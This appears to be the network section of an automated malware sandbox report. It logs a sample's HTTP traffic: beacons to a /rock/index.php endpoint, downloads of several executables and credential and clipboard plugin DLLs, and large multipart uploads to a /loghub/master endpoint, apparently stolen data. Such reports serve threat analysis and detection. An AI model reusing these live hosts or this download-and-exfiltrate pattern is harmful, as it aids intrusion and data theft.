Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
- TCP Requests
-
-
192.168.56.101:49208 193.233.254.61:80
-
192.168.56.101:49195 77.91.124.156:19071
-
192.168.56.101:49202 77.91.124.156:19071
-
192.168.56.101:49178 77.91.68.1:80
-
192.168.56.101:49193 77.91.68.3:80
-
192.168.56.101:49177 77.91.68.61:80
-
192.168.56.101:49182 77.91.68.61:80
-
192.168.56.101:49190 77.91.68.61:80
-
192.168.56.101:49198 77.91.68.61:80
-
192.168.56.101:49210 77.91.68.61:80
-
POST
200
http://77.91.68.61/rock/index.php
REQUEST
RESPONSE
BODY
POST /rock/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.68.61
Content-Length: 90
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 08 Aug 2023 00:11:44 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 242
Content-Type: text/html; charset=UTF-8
GET
200
http://77.91.68.1/new/foto4060.exe
REQUEST
RESPONSE
BODY
GET /new/foto4060.exe HTTP/1.1
Host: 77.91.68.1
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Tue, 08 Aug 2023 08:08:41 GMT
Accept-Ranges: bytes
ETag: "b2765d8bcfc9d91:0"
Server: Microsoft-IIS/10.0
Date: Tue, 08 Aug 2023 08:11:45 GMT
Content-Length: 569344
POST
200
http://77.91.68.61/rock/index.php
REQUEST
RESPONSE
BODY
POST /rock/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.68.61
Content-Length: 31
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 08 Aug 2023 00:11:50 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 3
Content-Type: text/html; charset=UTF-8
GET
200
http://77.91.68.1/new/fotod360.exe
REQUEST
RESPONSE
BODY
GET /new/fotod360.exe HTTP/1.1
Host: 77.91.68.1
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Tue, 08 Aug 2023 08:09:33 GMT
Accept-Ranges: bytes
ETag: "209465aacfc9d91:0"
Server: Microsoft-IIS/10.0
Date: Tue, 08 Aug 2023 08:11:50 GMT
Content-Length: 569344
POST
200
http://77.91.68.61/rock/index.php
REQUEST
RESPONSE
BODY
POST /rock/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.68.61
Content-Length: 31
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 08 Aug 2023 00:11:56 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 3
Content-Type: text/html; charset=UTF-8
GET
200
http://77.91.68.1/smo/du.exe
REQUEST
RESPONSE
BODY
GET /smo/du.exe HTTP/1.1
Host: 77.91.68.1
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Mon, 26 Jun 2023 16:10:23 GMT
Accept-Ranges: bytes
ETag: "1c2f35b648a8d91:0"
Server: Microsoft-IIS/10.0
Date: Tue, 08 Aug 2023 08:11:56 GMT
Content-Length: 30720
POST
200
http://77.91.68.61/rock/index.php
REQUEST
RESPONSE
BODY
POST /rock/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.68.61
Content-Length: 31
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 08 Aug 2023 00:11:57 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 3
Content-Type: text/html; charset=UTF-8
GET
200
http://77.91.68.3/fuzz/faman.exe
REQUEST
RESPONSE
BODY
GET /fuzz/faman.exe HTTP/1.1
Host: 77.91.68.3
HTTP/1.1 200 OK
Date: Tue, 08 Aug 2023 00:11:58 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 07 Aug 2023 23:47:02 GMT
ETag: "2d5184-6025ddced0980"
Accept-Ranges: bytes
Content-Length: 2969988
Content-Type: application/x-msdos-program
POST
200
http://77.91.68.61/rock/index.php
REQUEST
RESPONSE
BODY
POST /rock/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.68.61
Content-Length: 31
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 08 Aug 2023 00:12:04 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 3
Content-Type: text/html; charset=UTF-8
POST
200
http://193.233.254.61/loghub/master
REQUEST
RESPONSE
BODY
POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=bB154dqc2f8gK0zwGBqF
Content-Length: 213
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: 193.233.254.61
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 08 Aug 2023 00:12:16 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 120
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
POST
200
http://193.233.254.61/loghub/master
REQUEST
RESPONSE
BODY
POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=bB154dqc2f8gK0zwGBqF
Content-Length: 1170
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: 193.233.254.61
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 08 Aug 2023 00:12:16 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 8
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
POST
200
http://193.233.254.61/loghub/master
REQUEST
RESPONSE
BODY
POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=bB154dqc2f8gK0zwGBqF
Content-Length: 284
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: 193.233.254.61
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 08 Aug 2023 00:12:16 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2292
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
POST
200
http://193.233.254.61/loghub/master
REQUEST
RESPONSE
BODY
POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=bB154dqc2f8gK0zwGBqF
Content-Length: 276
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: 193.233.254.61
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 08 Aug 2023 00:12:16 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 4316
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
POST
200
http://193.233.254.61/loghub/master
REQUEST
RESPONSE
BODY
POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=bB154dqc2f8gK0zwGBqF
Content-Length: 272
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: 193.233.254.61
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 08 Aug 2023 00:12:17 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 1417736
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
POST
200
http://193.233.254.61/loghub/master
REQUEST
RESPONSE
BODY
POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=bB154dqc2f8gK0zwGBqF
Content-Length: 280
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: 193.233.254.61
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 08 Aug 2023 00:12:20 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 384
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
POST
200
http://193.233.254.61/loghub/master
REQUEST
RESPONSE
BODY
POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=bB154dqc2f8gK0zwGBqF
Content-Length: 393618
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: 193.233.254.61
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 08 Aug 2023 00:12:25 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 8
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
POST
200
http://193.233.254.61/loghub/master
REQUEST
RESPONSE
BODY
POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=bB154dqc2f8gK0zwGBqF
Content-Length: 306238
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: 193.233.254.61
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 08 Aug 2023 00:12:36 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 8
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
GET
404
http://77.91.68.61/rock/Plugins/cred64.dll
REQUEST
RESPONSE
BODY
GET /rock/Plugins/cred64.dll HTTP/1.1
Host: 77.91.68.61
HTTP/1.1 404 Not Found
Date: Tue, 08 Aug 2023 00:12:34 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 273
Content-Type: text/html; charset=iso-8859-1
GET
200
http://77.91.68.61/rock/Plugins/clip64.dll
REQUEST
RESPONSE
BODY
GET /rock/Plugins/clip64.dll HTTP/1.1
Host: 77.91.68.61
HTTP/1.1 200 OK
Date: Tue, 08 Aug 2023 00:12:34 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 24 Jul 2023 12:36:25 GMT
ETag: "16400-6013adce177e0"
Accept-Ranges: bytes
Content-Length: 91136
Content-Type: application/x-msdos-program
POST
200
http://193.233.254.61/loghub/master
REQUEST
RESPONSE
BODY
POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=bB154dqc2f8gK0zwGBqF
Content-Length: 1274
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: 193.233.254.61
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 08 Aug 2023 00:12:37 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 8
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
POST
200
http://193.233.254.61/loghub/master
REQUEST
RESPONSE
BODY
POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=bB154dqc2f8gK0zwGBqF
Content-Length: 268
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: 193.233.254.61
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 08 Aug 2023 00:12:37 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 1600
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
POST
200
http://193.233.254.61/loghub/master
REQUEST
RESPONSE
BODY
POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=bB154dqc2f8gK0zwGBqF
Content-Length: 268
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: 193.233.254.61
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 08 Aug 2023 00:12:38 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
POST
200
http://193.233.254.61/loghub/master
REQUEST
RESPONSE
BODY
POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=bB154dqc2f8gK0zwGBqF
Content-Length: 268
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: 193.233.254.61
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 08 Aug 2023 00:12:38 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 461500
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts